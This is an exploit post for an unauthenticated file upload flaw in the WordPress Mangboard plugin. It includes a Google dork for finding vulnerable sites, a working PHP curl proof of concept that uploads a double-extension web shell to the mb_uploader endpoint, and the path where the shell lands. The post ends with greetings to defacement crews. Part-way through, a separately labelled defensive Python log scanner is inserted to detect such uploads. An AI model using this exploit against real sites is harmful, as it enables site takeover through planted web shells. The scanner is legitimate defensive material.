Wordpress Mangboard Plugins File Upload Vulnerability

# Exploit Title: Wordpress Mangboard Plugins File Upload Vulnerability
# Google Dork: inurl:wp-content/plugins/mangboard/
# Date: 16-04-2017
# Exploit Author: Isal Dot ID
# Vendor Homepage: https://srd.wordpress.org/plugins/mangboard/
# Version: webapps
# Tested on: Windows 7

1. Description
Files can be uploaded without author access.

2. Proof of Concept

<?php

$uploadfile = "yourfile.php.gif"; // you can change this to php5, phtml, php.fla, etc.
$ch = curl_init("http://127.0.0.1/wp-admin/admin-ajax.php?mode=basic&action=mb_uploader");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>


Or use an online CSRF form: HERE
Set Postname to: Filedata

Shell path: /wp-content/uploads/mangboard/years/month/random number/random_yourshell.php.gif
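
A defender-side log check for the behaviour described above, as an added example that is not part of the original post. It flags POSTs to the `mb_uploader` action and requests under `/wp-content/uploads/mangboard/` whose file name carries a PHP-style segment anywhere after the base name (the `.php.gif` case). It assumes Combined Log Format; the extension list, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Segments commonly mapped to a PHP handler (assumption; match your server config).
EXEC_SEGMENTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
UPLOAD_DIR = "/wp-content/uploads/mangboard/"

# Combined Log Format: ip - - [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def has_exec_segment(filename):
    """True if any dot-separated segment after the base name is executable,
    so x.php.gif and x.phtml match while photo.gif does not."""
    return any(p in EXEC_SEGMENTS for p in filename.lower().split(".")[1:])

def classify(line):
    """Return (finding, client_ip, target) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, _status = m.groups()
    url = urlsplit(target)
    # A POST to the uploader action is a review lead, not proof of abuse.
    if (method == "POST" and url.path.endswith("/wp-admin/admin-ajax.php")
            and parse_qs(url.query).get("action") == ["mb_uploader"]):
        return ("upload_endpoint", ip, target)
    # Any request for an executable-looking name in the plugin's upload tree.
    if UPLOAD_DIR in url.path and has_exec_segment(url.path.rsplit("/", 1)[-1]):
        return ("exec_name_in_upload_dir", ip, target)
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE = [
    '203.0.113.7 - - [16/Apr/2017:10:00:01 +0000] "POST /wp-admin/admin-ajax.php?mode=basic&action=mb_uploader HTTP/1.1" 200 87',
    '203.0.113.7 - - [16/Apr/2017:10:00:09 +0000] "GET /wp-content/uploads/mangboard/2017/04/16/123_test.php.gif HTTP/1.1" 200 12',
    '198.51.100.4 - - [16/Apr/2017:10:01:00 +0000] "GET /wp-content/uploads/mangboard/2017/04/16/photo.gif HTTP/1.1" 200 5120',
    '198.51.100.4 - - [16/Apr/2017:10:02:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 60',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The same `has_exec_segment` check can be run over the file names already present in the upload directory to find files stored before logging was reviewed.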

Greetz : Strlen - Jje Incovers - ReC0ded - Pak Haxor - Ice-cream - Panataran - ex-Sh1Ne - Malaikat_Galau - ViruzTomcat - AdrElite - Wonka - Sh0uT0u7 - l0c4lh34rtz - Zombie-Root - KONSLET

Thanks To : Sanjungan Jiwa Team - Indonesian Defacer Tersakiti - Jembut Loyality - IndoXploit - Suram Crew - Extreme Crew - Bahari Trouble Maker - Indonesian People